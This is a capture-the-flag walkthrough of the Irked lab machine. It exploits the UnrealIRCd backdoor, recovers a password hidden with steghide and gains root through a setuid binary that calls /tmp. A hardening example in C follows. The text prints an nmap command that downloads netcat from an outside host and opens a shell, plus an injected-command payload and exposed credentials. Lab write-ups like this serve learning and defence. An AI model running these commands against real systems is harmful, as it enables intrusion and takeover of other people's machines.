Irked No.20 10.129.1.108
Nmap Scan Result:
Port 80 enumeration (manual): Apache 2.4.10
Dead end here for now...
I'll do one more round of directory busting with gobuster.
---
A full-port nmap scan shows port 8067 is open.
It's looking up the host name?
The service identifies as Unreal3.2.8.1 (UnrealIRCd).
https://www.infosecmatter.com/nmap-nse-library/?nse=irc-unrealircd-backdoor
nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh' 10.129.1.108
echo "AB; ping -c 3 192.168.49.130" | nc 192.168.130.120 8067
tcpdump -i tun1 icmp -v
Confirmed that we can do command execution.
Explanation: sometimes Linux may not be in bash mode, so we told the engine to go into bash mode with "bash -c" before executing the command.
Got a reverse shell:
Found a djmardov directory.
Running find . -ls -type f lists only regular files under the current directory.
Backup file.
Steg: steganography.
We only saw one picture, which was this image.
Extracting the password from an image file with steghide:
steghide extract -sf Desktop/irked.jpg -p UPupDOWNdownLRlrBAbaSSss
Kab6h+m+bbp2J:HG
I was able to ssh in as the user with the password found.
LinEnum.sh (download it from the attacking machine, then make it executable and run it):
wget http://10.10.16.13/LinEnum.sh -O LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
Ran LinPeas.sh
Now let's transfer the file over to kali and analyze it.
base64 -w0 /usr/bin/viewuser
This encodes the file as base64; -w0 disables line wrapping so it can be copied as one line.
base64 --decode textfile.txt > viewuser
Use ltrace to analyze it: the binary executes /tmp/listusers.
Since /tmp is writable by everyone, replacing that file with a shell gives us root.
Replaced the content with 👍
Ran the viewuser app.
Now we are root.
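As an added example that is not part of this writeup (and not the viewuser program from the box): a C sketch of how a setuid helper like viewuser could refuse to run a program that lives in a world-writable location such as /tmp, which is the weakness exploited above. The file and directory paths in it are placeholders chosen for illustration.

```c
#include <libgen.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* A location is considered trusted only if it belongs to root or to the
 * effective user of this helper (never the real, invoking user) and is not
 * writable by group or other. */
static int owned_and_locked(const struct stat *st) {
    if (st->st_uid != 0 && st->st_uid != geteuid()) return 0;
    if (st->st_mode & (S_IWGRP | S_IWOTH)) return 0;  /* others could replace it */
    return 1;
}

/* Returns 1 only if `path` is absolute, a regular file, not writable by
 * other users, and sits in a directory that is not writable by other users
 * either. Anything under /tmp (mode 1777) fails the directory check, which
 * is exactly why /tmp/listusers could be swapped for a shell. */
int safe_to_exec(const char *path) {
    struct stat st, dst;
    char dirbuf[4096];
    if (path == NULL || path[0] != '/') return 0;
    if (stat(path, &st) != 0 || !S_ISREG(st.st_mode)) return 0;
    if (!owned_and_locked(&st)) return 0;
    strncpy(dirbuf, path, sizeof dirbuf - 1);  /* dirname() may modify its arg */
    dirbuf[sizeof dirbuf - 1] = '\0';
    if (stat(dirname(dirbuf), &dst) != 0) return 0;
    return owned_and_locked(&dst);
}

/* Hardened helper: refuse replaceable paths, drop the setuid privileges,
 * then exec the program directly (no shell, no PATH lookup). The default
 * target is a placeholder path, not the one used by the real viewuser. */
int main(int argc, char **argv) {
    const char *target = argc > 1 ? argv[1] : "/usr/local/libexec/listusers";
    if (!safe_to_exec(target)) {
        fprintf(stderr, "refusing to run %s: not a trusted path\n", target);
        return 1;
    }
    if (setgid(getgid()) != 0 || setuid(getuid()) != 0) return 1;
    execl(target, target, (char *)NULL);
    perror("execl");
    return 1;
}
```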